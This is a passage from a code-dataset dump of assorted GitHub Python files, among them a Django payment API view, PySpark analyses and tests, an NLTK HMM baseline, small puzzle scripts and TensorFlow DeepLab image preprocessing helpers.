VBIlen\n","repo_name":"Tautulli/Tautulli","sub_path":"lib/paho/mqtt/properties.py","file_name":"properties.py","file_ext":"py","file_size_in_byte":17137,"program_lang":"python","lang":"en","doc_type":"code","stars":5119,"dataset":"github-code","pt":"99"} +{"seq_id":"3390274217","text":"from django.utils.translation import gettext as _\nfrom django.conf import settings\nfrom django.utils import timezone\n\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom gdaf.utils import ni_etat_civil\nfrom apps.payments.models import NoteImpositionPaymentStatement\n\nIHELA_AGENCE_MAPPING = getattr(settings, \"IHELA_AGENCE_MAPPING\", {})\n\n\nclass DocumentTypeListAPIView(APIView):\n def get(self, request):\n etat_civil = ni_etat_civil.EtatCivilAPI(fetch_token=False)\n returned_status, returned_data = etat_civil.get_tarif()\n return Response(returned_data, status=returned_status)\n\n\nclass AvisImpositionAPIView(APIView):\n def get(self, request, reference):\n etat_civil = ni_etat_civil.EtatCivilAPI()\n\n returned_status, returned_data = etat_civil.get_avis_imposition_request(\n reference\n )\n return Response(returned_data, status=returned_status)\n\n\nclass AvisImpositionPayAPIView(APIView):\n def post(self, request):\n etat_civil = ni_etat_civil.EtatCivilAPI()\n request_data = self.request.data.get(\"noteimposition_data\", {})\n\n returned_data = {}\n returned_status = status.HTTP_200_OK\n\n reference = request_data.get(\"note_imposition\", None)\n nom_banque = request_data.get(\"bank_name\", None)\n code_banque = request_data.get(\"bank_code\", None)\n nom_agence = request_data.get(\"bank_branch_name\", None)\n reference_ext = request_data.get(\"bank_reference\", None)\n quantite = request_data.get(\"quantity\", None)\n code_document = request_data.get(\"doctype\", None)\n demandeur = request_data.get(\"client_name\", None)\n prix_totale = request_data.get(\"amount\", None)\n description = request_data.get(\"client_description\", None)\n identite = request_data.get(\"client_id_card_no\", None)\n bank_user = request_data.get(\"bank_user\", None)\n bank_description = request_data.get(\"bank_description\", None)\n\n # If there is no reference given, the note is created\n # Required params are code_document and quantite\n if not reference and code_document and quantite:\n new_imp_status, new_imposition = etat_civil.creation_avis_imposition_request(\n code_document, quantite, demandeur, description, identite\n )\n\n if new_imp_status != status.HTTP_200_OK:\n returned_data[\"error\"] = True\n returned_data[\"error_message\"] = _(\n \"Could not create a new document note.\"\n )\n reference = None\n else:\n reference = new_imposition.get(\"reference\")\n description = new_imposition.get(\"doctype\")\n\n print(\"ALL DATA : \", request.data)\n\n if reference and nom_banque and code_banque and nom_agence:\n returned_status, returned_data = etat_civil.pay_avis_imposition(\n reference_avis=reference,\n code_banque=code_banque,\n nom_banque=nom_banque,\n nom_agence=nom_agence,\n prix_totale=prix_totale,\n quantite=quantite,\n reference_ext=reference_ext,\n )\n\n if not returned_data.get(\"error\", True):\n NoteImpositionPaymentStatement.objects.create(\n note_imposition=reference,\n note_type=NoteImpositionPaymentStatement.ETAT_CIVIL,\n user=self.request.user,\n ref_paiement=reference_ext,\n # agence=models.Agence.objects.get(\n # code=\"15\"\n # ).pk, # TODO: Get Agence from API.\n agence=IHELA_AGENCE_MAPPING[code_banque],\n date_paiement=timezone.now(),\n montant_tranche=prix_totale,\n bank_name=nom_banque,\n bank_user=bank_user,\n bank_description=bank_description,\n )\n\n returned_data[\"description\"] = description\n\n else:\n returned_data = {\n \"error\": True,\n \"error_message\": _(\n \"Could not find a document note or create a new one.\"\n ),\n }\n return Response(returned_data, status=returned_status)\n","repo_name":"augustinbingwa/gdafgdafSysteme","sub_path":"api/payments/views/etat_civil.py","file_name":"etat_civil.py","file_ext":"py","file_size_in_byte":4411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31867867788","text":"import networkx as nx\nfrom pyvis.network import Network\nfrom matplotlib.colors import TABLEAU_COLORS\n\n__all__ = [\n 'tableau_colors',\n 'networkx_graph_to_pyvis_network',\n]\n\ntableau_colors = list(TABLEAU_COLORS.values())\n\n\ndef networkx_graph_to_pyvis_network(\n g: nx.Graph,\n node_label: str = 'label',\n node_title: str = 'title',\n node_size: str = 'size',\n node_color: str = 'color',\n edge_weight: str = 'weight',\n height: str = '100%',\n width: str = '100%',\n notebook: bool = False,\n heading: str = '',\n gravity: int = -10000,\n) -> Network:\n node_labels = nx.get_node_attributes(g, node_label)\n node_titles = nx.get_node_attributes(g, node_title)\n node_sizes = nx.get_node_attributes(g, node_size)\n node_colors = nx.get_node_attributes(g, node_color)\n edge_widths = nx.get_edge_attributes(g, edge_weight)\n\n network = Network(height=height, width=width, directed=nx.is_directed(g), notebook=notebook, heading=heading)\n\n for node in g.nodes:\n label = node_labels.get(node, node)\n title = node_titles.get(node, node)\n size = node_sizes.get(node, 10)\n color = node_colors.get(node, tableau_colors[0])\n\n network.add_node(node, label=label, title=title, size=float(size), color=color)\n\n for edge in g.edges:\n width = edge_widths.get(edge, 1)\n network.add_edge(*edge, width=float(width))\n\n network.barnes_hut(gravity=gravity)\n\n return network\n","repo_name":"ylytkin/notion-graph-view","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"19242406562","text":"from nltk.tag import hmm\nimport time\nimport load_conll\nimport numpy as np\nfrom lstm.evaluation.confusion_matrix import ConfusionMatrix\n\ndef transform_classes_to_binary(y, labels_list):\n labels_list = np.array(labels_list)\n y = np.array([np.array([np.array([1 if np.where(labels_list == label)[0] == i else 0 for i in range(0, len(labels_list))]) for label in sentence]) for sentence in y])\n return y\n\nprint(\"HMM script started\")\nstart = time.time()\nx_train_dev, y_arg_train_dev, y_rhet_train_dev, y_aspect_train_dev, y_summary_train_dev, y_citation_train_dev = load_conll.load_data_multiple(path=\"./../annotations_conll_final_splitted/train_dev/\")\nx_test, y_arg_test, y_rhet_test, y_aspect_test, y_summary_test, y_citation_test = load_conll.load_data_multiple(path=\"./../annotations_conll_final_splitted/test/\")\nprint(\"Data loaded\")\n\n# provide token-label tuples to the trainer\nxy_train_dev = [list(zip(x_sent, y_sent)) for (x_sent, y_sent) in list(zip(x_train_dev, y_citation_train_dev))]\n\n# Setup a trainer with default(None) values\n# And train with the data\ntrainer = hmm.HiddenMarkovModelTrainer()\ntagger = trainer.train_supervised(xy_train_dev)\n#x_test = [list(x_sent) for x_sent in x_test]\nxy_pred = [tagger.tag(list(x_sent)) for x_sent in x_test]\n#xy_prd = tagger.tag(x_test)\ny_pred = [[y_token for x_token, y_token in sentence] for sentence in xy_pred]\n\nlabels = list(set([lab for sublist in y_citation_train_dev for lab in sublist]))\ny_citation_test = transform_classes_to_binary(y_citation_test, labels)\ny_pred = transform_classes_to_binary(y_pred, labels)\n\nconfusion_matrix = ConfusionMatrix(labels=labels, gold=y_citation_test, predictions=y_pred, token_level=True, one_hot_encoding=True)\nconfusion_matrix.compute_all_scores(exclude_class=\"NONE\\n\")\nprint(str(confusion_matrix.get_all_results()))\n\nprint(\"Total training time: \" + str(time.time() - start))\n\n","repo_name":"anlausch/multitask_sciarg","sub_path":"baselines/hmm.py","file_name":"hmm.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"73456519046","text":"#\nimport copy\nimport itertools\n\n\n# 计算出4个数所有的排列\ndef calculate_list(nums,length=4):\n origin_list = list(set(itertools.permutations(nums, length)))\n return origin_list\n\n\n# 计算任意2个数,四则运算的结果\ndef arithmetic(num1, num2):\n list = [num1 + num2, num1 - num2, num1 * num2, num1 / num2]\n return list\n\n\ndef rebuild_list(origin_list_part):\n for cell in set(itertools.combinations(origin_list_part, 2)): # 计算两个数的组合\n answer=[]\n answer=arithmetic(cell[0], cell[1])\n list = copy.deepcopy(origin_list_part)\n list.remove(cell[0])\n list.remove(cell[1])\n list=list(set(itertools.product(list,answer)))\n return list\n\nif __name__ == \"__main__\":\n nums=list(map(int,input().split()))\n origin_list=calculate_list(nums)\n for origin_list_part in origin_list:\n print(rebuild_list(origin_list_part))\n\n","repo_name":"yzl-eng/StudySpace","sub_path":"Notebook/Python/Python算法/示例代码/枚举算法思想/破解24点游戏.py","file_name":"破解24点游戏.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"45717295097","text":"def dec_to_bin(n: int) -> str:\n \"\"\"Перевод в двоичную систему исчисления из десятичной.\"\"\"\n s = ''\n while n != 0:\n s += str(n % 2)\n n //= 2\n s = s[:]\n return s\n\n\ndef bin_to_dec(s: str) -> int:\n \"\"\"Перевод из двоичной системы в десятичную.\"\"\"\n n = 0\n for num, symbol in enumerate(s):\n n += int(symbol)*2**(len(s)-num - 1)\n return n\n\n\ndef solve_contest_task():\n \"\"\"Решение задачи из контеста с применением операции XOR.\"\"\"\n result = 0\n for elem in input():\n result = result ^ ord(elem)\n for elem in input():\n result = result ^ ord(elem)\n print(chr(result))\n","repo_name":"alexey87100/algo_1","sub_path":"xor.py","file_name":"xor.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31653213852","text":"import tensorflow.compat.v1 as tf\n\n\ndef pad_to_bounding_box(image, offset_height, offset_width, target_height,\n target_width, pad_value):\n \"\"\"Pads the given image with the given pad_value.\n\n Works like tf.image.pad_to_bounding_box, except it can pad the image\n with any given arbitrary pad value and also handle images whose sizes are not\n known during graph construction.\n Args:\n image: 3-D tensor with shape [height, width, channels]\n offset_height: Number of rows of zeros to add on top.\n offset_width: Number of columns of zeros to add on the left.\n target_height: Height of output image.\n target_width: Width of output image.\n pad_value: Value to pad the image tensor with.\n\n Returns:\n 3-D tensor of shape [target_height, target_width, channels].\n Raises:\n ValueError: If the shape of image is incompatible with the offset_* or\n target_* arguments.\n \"\"\"\n image_rank = tf.rank(image)\n image_rank_assert = tf.Assert(\n tf.equal(image_rank, 3),\n ['Wrong image tensor rank [Expected] [Actual]', 3, image_rank])\n with tf.control_dependencies([image_rank_assert]):\n image -= pad_value\n image_shape = tf.shape(image)\n height, width = image_shape[0], image_shape[1]\n target_width_assert = tf.Assert(\n tf.greater_equal(target_width, width), ['target_width must be >= width'])\n target_height_assert = tf.Assert(\n tf.greater_equal(target_height, height),\n ['target_height must be >= height'])\n with tf.control_dependencies([target_width_assert]):\n after_padding_width = target_width - offset_width - width\n with tf.control_dependencies([target_height_assert]):\n after_padding_height = target_height - offset_height - height\n offset_assert = tf.Assert(\n tf.logical_and(\n tf.greater_equal(after_padding_width, 0),\n tf.greater_equal(after_padding_height, 0)),\n ['target size not possible with the given target offsets'])\n\n height_params = tf.stack([offset_height, after_padding_height])\n width_params = tf.stack([offset_width, after_padding_width])\n channel_params = tf.stack([0, 0])\n with tf.control_dependencies([offset_assert]):\n paddings = tf.stack([height_params, width_params, channel_params])\n padded = tf.pad(image, paddings)\n return padded + pad_value\n\n\ndef _crop(image, offset_height, offset_width, crop_height, crop_width):\n \"\"\"Crops the given image using the provided offsets and sizes.\n\n Note that the method doesn't assume we know the input image size but it does\n assume we know the input image rank.\n Args:\n image: an image of shape [height, width, channels].\n offset_height: a scalar tensor indicating the height offset.\n offset_width: a scalar tensor indicating the width offset.\n crop_height: the height of the cropped image.\n crop_width: the width of the cropped image.\n\n Returns:\n The cropped (and resized) image.\n Raises:\n ValueError: if `image` doesn't have rank of 3.\n InvalidArgumentError: if the rank is not 3 or if the image dimensions are\n less than the crop size.\n \"\"\"\n original_shape = tf.shape(image)\n\n if len(image.get_shape().as_list()) != 3:\n raise ValueError('input must have rank of 3')\n original_channels = image.get_shape().as_list()[2]\n\n rank_assertion = tf.Assert(\n tf.equal(tf.rank(image), 3), ['Rank of image must be equal to 3.'])\n with tf.control_dependencies([rank_assertion]):\n cropped_shape = tf.stack([crop_height, crop_width, original_shape[2]])\n\n size_assertion = tf.Assert(\n tf.logical_and(\n tf.greater_equal(original_shape[0], crop_height),\n tf.greater_equal(original_shape[1], crop_width)),\n ['Crop size greater than the image size.'])\n\n offsets = tf.to_int32(tf.stack([offset_height, offset_width, 0]))\n\n # Use tf.slice instead of crop_to_bounding box as it accepts tensors to\n # define the crop size.\n with tf.control_dependencies([size_assertion]):\n image = tf.slice(image, offsets, cropped_shape)\n image = tf.reshape(image, cropped_shape)\n image.set_shape([crop_height, crop_width, original_channels])\n return image\n\n\ndef random_crop(image_list, crop_height, crop_width):\n \"\"\"Crops the given list of images.\n\n The function applies the same crop to each image in the list. This can be\n effectively applied when there are multiple image inputs of the same\n dimension such as:\n image, depths, normals = random_crop([image, depths, normals], 120, 150)\n Args:\n image_list: a list of image tensors of the same dimension but possibly\n varying channel.\n crop_height: the new height.\n crop_width: the new width.\n\n Returns:\n the image_list with cropped images.\n Raises:\n ValueError: if there are multiple image inputs provided with different size\n or the images are smaller than the crop dimensions.\n \"\"\"\n if not image_list:\n raise ValueError('Empty image_list.')\n\n # Compute the rank assertions.\n rank_assertions = []\n for i in range(len(image_list)):\n image_rank = tf.rank(image_list[i])\n rank_assert = tf.Assert(\n tf.equal(image_rank, 3), [\n 'Wrong rank for tensor %s [expected] [actual]', image_list[i].name,\n 3, image_rank\n ])\n rank_assertions.append(rank_assert)\n\n with tf.control_dependencies([rank_assertions[0]]):\n image_shape = tf.shape(image_list[0])\n image_height = image_shape[0]\n image_width = image_shape[1]\n crop_size_assert = tf.Assert(\n tf.logical_and(\n tf.greater_equal(image_height, crop_height),\n tf.greater_equal(image_width, crop_width)),\n ['Crop size greater than the image size.'])\n\n asserts = [rank_assertions[0], crop_size_assert]\n\n for i in range(1, len(image_list)):\n image = image_list[i]\n asserts.append(rank_assertions[i])\n with tf.control_dependencies([rank_assertions[i]]):\n shape = tf.shape(image)\n height = shape[0]\n width = shape[1]\n\n height_assert = tf.Assert(\n tf.equal(height, image_height), [\n 'Wrong height for tensor %s [expected][actual]', image.name, height,\n image_height\n ])\n width_assert = tf.Assert(\n tf.equal(width, image_width), [\n 'Wrong width for tensor %s [expected][actual]', image.name, width,\n image_width\n ])\n asserts.extend([height_assert, width_assert])\n\n # Create a random bounding box.\n #\n # Use tf.random_uniform and not numpy.random.rand as doing the former would\n # generate random numbers at graph eval time, unlike the latter which\n # generates random numbers at graph definition time.\n with tf.control_dependencies(asserts):\n max_offset_height = tf.reshape(image_height - crop_height + 1, [])\n max_offset_width = tf.reshape(image_width - crop_width + 1, [])\n offset_height = tf.random_uniform([],\n maxval=max_offset_height,\n dtype=tf.int32)\n offset_width = tf.random_uniform([], maxval=max_offset_width, dtype=tf.int32)\n\n return [\n _crop(image, offset_height, offset_width, crop_height, crop_width)\n for image in image_list\n ]\n\n\ndef get_random_scale(min_scale_factor, max_scale_factor, step_size):\n \"\"\"Gets a random scale value.\n\n Args:\n min_scale_factor: Minimum scale value.\n max_scale_factor: Maximum scale value.\n step_size: The step size from minimum to maximum value.\n\n Returns:\n A random scale value selected between minimum and maximum value.\n Raises:\n ValueError: min_scale_factor has unexpected value.\n \"\"\"\n if min_scale_factor < 0 or min_scale_factor > max_scale_factor:\n raise ValueError('Unexpected value of min_scale_factor.')\n\n if min_scale_factor == max_scale_factor:\n return tf.to_float(min_scale_factor)\n\n # When step_size = 0, we sample the value uniformly from [min, max).\n if step_size == 0:\n return tf.random_uniform([1],\n minval=min_scale_factor,\n maxval=max_scale_factor)\n\n # When step_size != 0, we randomly select one discrete value from [min, max].\n num_steps = int((max_scale_factor - min_scale_factor) / step_size + 1)\n scale_factors = tf.lin_space(min_scale_factor, max_scale_factor, num_steps)\n shuffled_scale_factors = tf.random_shuffle(scale_factors)\n return shuffled_scale_factors[0]\n\n\ndef randomly_scale_image_and_label(image, label=None, scale=1.0):\n \"\"\"Randomly scales image and label.\n\n Args:\n image: Image with shape [height, width, 3].\n label: Label with shape [height, width, 1].\n scale: The value to scale image and label.\n\n Returns:\n Scaled image and label.\n \"\"\"\n # No random scaling if scale == 1.\n if scale == 1.0:\n return image, label\n image_shape = tf.shape(image)\n new_dim = tf.to_int32(tf.to_float([image_shape[0], image_shape[1]]) * scale)\n\n # Need squeeze and expand_dims because image interpolation takes\n # 4D tensors as input.\n image = tf.squeeze(\n tf.image.resize_bilinear(\n tf.expand_dims(image, 0), new_dim, align_corners=True), [0])\n if label is not None:\n label = tf.squeeze(\n tf.image.resize_nearest_neighbor(\n tf.expand_dims(label, 0), new_dim, align_corners=True), [0])\n\n return image, label\n\n\ndef resolve_shape(tensor, rank=None, scope=None):\n \"\"\"Fully resolves the shape of a Tensor.\n\n Use as much as possible the shape components already known during graph\n creation and resolve the remaining ones during runtime.\n Args:\n tensor: Input tensor whose shape we query.\n rank: The rank of the tensor, provided that we know it.\n scope: Optional name scope.\n\n Returns:\n shape: The full shape of the tensor.\n \"\"\"\n with tf.name_scope(scope, 'resolve_shape', [tensor]):\n if rank is not None:\n shape = tensor.get_shape().with_rank(rank).as_list()\n else:\n shape = tensor.get_shape().as_list()\n\n if None in shape:\n shape_dynamic = tf.shape(tensor)\n for i in range(len(shape)):\n if shape[i] is None:\n shape[i] = shape_dynamic[i]\n\n return shape\n\n\ndef resize_to_range(image,\n label=None,\n min_size=None,\n max_size=None,\n factor=None,\n align_corners=True,\n label_layout_is_chw=False,\n scope=None,\n method=tf.image.ResizeMethod.BILINEAR):\n \"\"\"Resizes image or label so their sides are within the provided range.\n\n The output size can be described by two cases:\n 1. If the image can be rescaled so its minimum size is equal to min_size\n without the other side exceeding max_size, then do so.\n 2. Otherwise, resize so the largest side is equal to max_size.\n An integer in `range(factor)` is added to the computed sides so that the\n final dimensions are multiples of `factor` plus one.\n Args:\n image: A 3D tensor of shape [height, width, channels].\n label: (optional) A 3D tensor of shape [height, width, channels] (default)\n or [channels, height, width] when label_layout_is_chw = True.\n min_size: (scalar) desired size of the smaller image side.\n max_size: (scalar) maximum allowed size of the larger image side. Note that\n the output dimension is no larger than max_size and may be slightly\n smaller than min_size when factor is not None.\n factor: Make output size multiple of factor plus one.\n align_corners: If True, exactly align all 4 corners of input and output.\n label_layout_is_chw: If true, the label has shape [channel, height, width].\n We support this case because for some instance segmentation dataset, the\n instance segmentation is saved as [num_instances, height, width].\n scope: Optional name scope.\n method: Image resize method. Defaults to tf.image.ResizeMethod.BILINEAR.\n\n Returns:\n A 3-D tensor of shape [new_height, new_width, channels], where the image\n has been resized (with the specified method) so that\n min(new_height, new_width) == ceil(min_size) or\n max(new_height, new_width) == ceil(max_size).\n Raises:\n ValueError: If the image is not a 3D tensor.\n \"\"\"\n with tf.name_scope(scope, 'resize_to_range', [image]):\n new_tensor_list = []\n min_size = tf.to_float(min_size)\n if max_size is not None:\n max_size = tf.to_float(max_size)\n # Modify the max_size to be a multiple of factor plus 1 and make sure the\n # max dimension after resizing is no larger than max_size.\n if factor is not None:\n max_size = (\n max_size + (factor - (max_size - 1) % factor) % factor - factor)\n\n [orig_height, orig_width, _] = resolve_shape(image, rank=3)\n orig_height = tf.to_float(orig_height)\n orig_width = tf.to_float(orig_width)\n orig_min_size = tf.minimum(orig_height, orig_width)\n\n # Calculate the larger of the possible sizes\n large_scale_factor = min_size / orig_min_size\n large_height = tf.to_int32(tf.ceil(orig_height * large_scale_factor))\n large_width = tf.to_int32(tf.ceil(orig_width * large_scale_factor))\n large_size = tf.stack([large_height, large_width])\n\n new_size = large_size\n if max_size is not None:\n # Calculate the smaller of the possible sizes, use that if the larger\n # is too big.\n orig_max_size = tf.maximum(orig_height, orig_width)\n small_scale_factor = max_size / orig_max_size\n small_height = tf.to_int32(tf.ceil(orig_height * small_scale_factor))\n small_width = tf.to_int32(tf.ceil(orig_width * small_scale_factor))\n small_size = tf.stack([small_height, small_width])\n new_size = tf.cond(\n tf.to_float(tf.reduce_max(large_size)) >\n max_size, lambda: small_size, lambda: large_size)\n # Ensure that both output sides are multiples of factor plus one.\n if factor is not None:\n new_size += (factor - (new_size - 1) % factor) % factor\n new_tensor_list.append(\n tf.image.resize_images(\n image, new_size, method=method, align_corners=align_corners))\n if label is not None:\n if label_layout_is_chw:\n # Input label has shape [channel, height, width].\n resized_label = tf.expand_dims(label, 3)\n resized_label = tf.image.resize_nearest_neighbor(\n resized_label, new_size, align_corners=align_corners)\n resized_label = tf.squeeze(resized_label, 3)\n else:\n # Input label has shape [height, width, channel].\n resized_label = tf.image.resize_images(\n label,\n new_size,\n method=tf.image.ResizeMethod.NEAREST_NEIGHBOR,\n align_corners=align_corners)\n new_tensor_list.append(resized_label)\n else:\n new_tensor_list.append(None)\n return new_tensor_list\n","repo_name":"google-research/google-research","sub_path":"resolve_ref_exp_elements_ml/deeplab/preprocess_utils.py","file_name":"preprocess_utils.py","file_ext":"py","file_size_in_byte":14625,"program_lang":"python","lang":"en","doc_type":"code","stars":31433,"dataset":"github-code","pt":"99"} +{"seq_id":"19050157598","text":"# Words combination\n# Create a program that reads an input string\n# and then creates and prints 5 random strings\n# from characters of the input string.\n# For example, the program obtained the word ‘hello’,\n# so it should print 5 random strings(words)\n# that combine characters ‘h’, ‘e’, ‘l’, ‘l’, ‘o’ -> ‘hlelo’, ‘olelh’, ‘loleh’ …\n# Tips: Use random module to get random char from string)\n\nimport random\n\ncollect_words = []\n\nbasic_word = input('Введіть своє слово: ')\nword_list = list(basic_word.lower())\n\nwhile len(collect_words) < 5:\n random.shuffle(word_list)\n one_word = ''.join(word_list)\n if (one_word not in collect_words) and (one_word != basic_word):\n collect_words.append(one_word)\n\nprint(*collect_words)\n","repo_name":"romanpovzyk/ba_python_tasks_04_","sub_path":"task_3.py","file_name":"task_3.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"5349449600","text":"\"\"\"Task Manipulation.\"\"\"\n\nimport os\n\nimport numpy as np\nfrom PIL import Image\n\n\nclass Task(object):\n \"\"\"Task.\"\"\"\n\n def __init__(self, resources, duration, label):\n self.resources = resources\n self.duration = duration\n self.label = label\n self.dimension = len(resources)\n\n def summary(self, bg_shape=None):\n \"\"\"State representation.\"\"\"\n if bg_shape is None:\n bg_shape = (self.duration, max(self.resources))\n if self.dimension > 0:\n state_matrices = [np.full(bg_shape, 255, dtype=np.uint8) for i in range(self.dimension)]\n for i in range(self.dimension):\n for row in range(self.duration):\n for col in range(self.resources[i]):\n state_matrices[i][row, col] = 0\n temp = state_matrices[0]\n for i in range(1, self.dimension):\n temp = np.concatenate((temp, state_matrices[i]), axis=1)\n return temp\n else:\n return None\n\n def __repr__(self):\n return 'Task(resources={0}, duration={1}, label={2})'.format(self.resources, self.duration, self.label)\n\n","repo_name":"yxc135/deeprm-scheduler","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"99"} +{"seq_id":"3978340497","text":"from pyspark import SparkContext\nfrom pyspark.sql.session import SparkSession\nfrom pyspark.sql import functions as F\nfrom pyspark.sql.types import *\n\n# start spark with 1 worker thread\nsc = SparkContext(\"local[1]\")\nsc.setLogLevel(\"ERROR\")\n\nspark = SparkSession(sc)\n\n# 1) What is the distribution of the machines according to their CPU capacity?\n\n# machine_events schema\nmachineEventsSchema = StructType(\n [\n StructField(\"timestamp\", LongType(), True),\n StructField(\"machine_id\", StringType(), True),\n StructField(\"event_type\", StringType(), True),\n StructField(\"platfrom_id\", StringType(), True),\n StructField(\"capacity_cpu\", FloatType(), True),\n StructField(\"capacity_memory\", FloatType(), True),\n ]\n)\n\n# machine_events df\nmachineEventsDf = spark.read.schema(machineEventsSchema).csv(\n \"../data/machine_events/*.csv.gz\"\n)\n\ncpuCapacityCountDf = machineEventsDf.select(\"machine_id\", \"capacity_cpu\").distinct().where(\n F.col(\"capacity_cpu\").isNotNull()\n).groupBy(\"capacity_cpu\").count()\n\ncpuCapacityCountDf.coalesce(1).write.csv(\n \"../data/output/analysis1/machine_cpu_capacity_dist\", header=True, mode=\"overwrite\"\n)\n\n\n\n","repo_name":"asadwan/spark-project","sub_path":"code/analysis1.py","file_name":"analysis1.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74083279046","text":"from matminer.featurizers.base import BaseFeaturizer\n\nfrom .datasets import retrieve_dataset\nfrom .featurizers import create_featurizer\nfrom .task_updates import save_progress, save_result\nfrom .users import Users\nfrom .datasets import retrieve_dataset\n\n\nclass FeaturizerJob: \n \"\"\"Apply featurizer to a column and add the resulting column to the dataset\n \"\"\"\n def __init__(self, task_id: str, email: str) -> None:\n _, data = Users().read(email)\n self.email = email\n self.workflow = data[\"workflow\"]\n self.dataset = data[\"current_dataset\"]\n self.featurizer: BaseFeaturizer = create_featurizer(self.workflow.featurizer)\n\n # Load the dataset:\n # If there's an existing current_dataset, it's likely left-over from when the user selected a different featurizer\n self.dataset = retrieve_dataset(self.workflow.dataset)\n\n def featurize(self) -> str:\n \"\"\"Featurize column\n\n Returns:\n str: success message\n \"\"\"\n users = Users()\n\n save_progress(self.email, \"Starting to Featurize\")\n output_df = self.featurizer.featurize_dataframe(\n self.dataset, self.workflow.column_to_featurize, ignore_errors=True, return_errors=True, pbar=False\n )\n\n save_progress(self.email, \"Featurization Complete, Saving Results\")\n\n # save updated dataset to database\n users.update({\"email\": self.email, \"current_dataset\": output_df})\n\n save_result(self.email, {\"table\": \"users\", \"key\": self.email})\n\n return str(\"Featurized Column Created\")\n","repo_name":"zhaoqiwang1997/HackingMaterialsUI","sub_path":"src/backend/src/featurize_column.py","file_name":"featurize_column.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"4861561650","text":"\"\"\" PySpark unit tests\n Create the input dataframe\n Create the output dataframe using the function we want to test\n Specify the expected output values\n Compare the results\n\"\"\"\n\nimport os\nimport pytest\nfrom src.main import Transformation, set_env_vars\nfrom chispa.dataframe_comparer import assert_df_equality\n\n\nset_env_vars()\ninput_path= os.getenv(\"input_path_dataset\")\ntransformer = Transformation(input_path)\n\n\n@pytest.mark.usefixtures('spark')\ndef test_read_file(spark):\n data = [{'name': 'Alice', 'id': \"1\"},{'name': 'Mario', 'id': \"2\"}]\n expected_df = spark.createDataFrame(data)\n transf = Transformation('dataset/test_dataset.csv')\n actual_df = transf.read_file()\n assert_df_equality(actual_df, expected_df, ignore_row_order=True,ignore_column_order=True)\n\n\n@pytest.mark.usefixtures('spark')\ndef test_apply_filters(spark):\n input_columns = [\n \"REPLACING-RENAULT-REF\", \"REPLACING-SUPPLIER-REF\", \"REPLACING-SUPPLIER-NAME\",\n \"REPLACED-RENAULT-REF\",\t\"REPLACED-SUPPLIER-REF\", \"REPLACEMENT-DATE\", \t\n ]\n input_data = [\n (None, '#N/A', 'SHELL', '8671013783', 'NOUVEAU', '03/11/2014'),\n (None, '#N/A', 'SHELL', 'xxx', 'NOUVEAU', '03/11/2014'),\n ('8660000025', '#N/A', 'SHELL', '8671013785', 'NOUVEAU','03/11/2014'),\n ('8660000710', '437444', 'Valeo', '8671000020', '#N/A','13/02/2019'),\n ('8660000710', '437444', 'Valeo', '8671000000', '#N/A','13/02/2018'),\n ('0', '#N/A', 'INCONNU AM', '8671000000', 'CONSOMMABLES','13/02/2014'),\n ('0', '#N/A', 'AWS', '8671000001', 'CONSOMMABLES', '13/02/2014'),\n ('8660000712', '#N/A', 'aws', '8671000002', 'CONSOMMABLES','13/02/2014'),\n ('8660000713', '#N/A', 'CLOUD', '8671000003', 'CONSOMMABLES','13/02/2014')\n ]\n input_df = spark.createDataFrame(input_data).toDF(*input_columns)\n output_columns = input_columns + [\"SHIPPING_DATE\"]\n output_data = [(\"8660000025\",\"EMPTY\",\"SHELL\",\"8671013785\",\"NOUVEAU\",\"03/11/2014\",\"2023\"), \n (\"8660000710\",\"437444\",\"Valeo\",\"8671000000\",\"EMPTY\",\"13/02/2018\",\"2024\"), \n (\"8660000713\",\"EMPTY\",\"CLOUD\",\"8671000003\",\"CONSOMMABLES\",\"13/02/2014\",\"2022\")]\n excepted_df = spark.createDataFrame(output_data).toDF(*output_columns)\n actual_df = transformer.apply_filters(dataset=input_df)\n assert_df_equality(actual_df, excepted_df)\n\n\n@pytest.mark.usefixtures('spark')\ndef test_save_dataframe_to_csv(spark):\n destination_path = 'dataset/output/test'\n data = [{'name': 'Alice', 'id': \"1\"},{'name': 'Mario', 'id': \"2\"}]\n expected_df = spark.createDataFrame(data)\n transformer.save_dataframe_to_csv(expected_df,destination_path)\n actual_df = spark.read.csv(destination_path,header=True)\n assert_df_equality(actual_df, expected_df, ignore_row_order=True)\n","repo_name":"ahmedR94/pyspark-tutorial","sub_path":"tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"71242039364","text":"# -*- encoding: utf-8 -*-\nimport argparse\nimport csv\nimport json\nimport requests\nimport sys\n\nfrom dateutil.parser import parse\n\n\nargparser = argparse.ArgumentParser(\n description=\"Create a Preservation in a workspace from Slack Enterprise Datasource\",\n epilog=\"You can also get a list of existing Slack Enterprise Datasources in your account\",\n)\nargparser.add_argument(\n \"--username\", required=True, type=str, help=\"Onna Account username\"\n)\nargparser.add_argument(\"--password\", required=True, type=str, help=\"password\")\nargparser.add_argument(\n \"--account\", required=True, type=str, help=\"The Onna account name\"\n)\nargparser.add_argument(\n \"--account_url\",\n required=True,\n type=str,\n help=\"The URL of your account, e.g https://company.onna.io or https://enterprise.onna.com\",\n)\nargparser.add_argument(\n 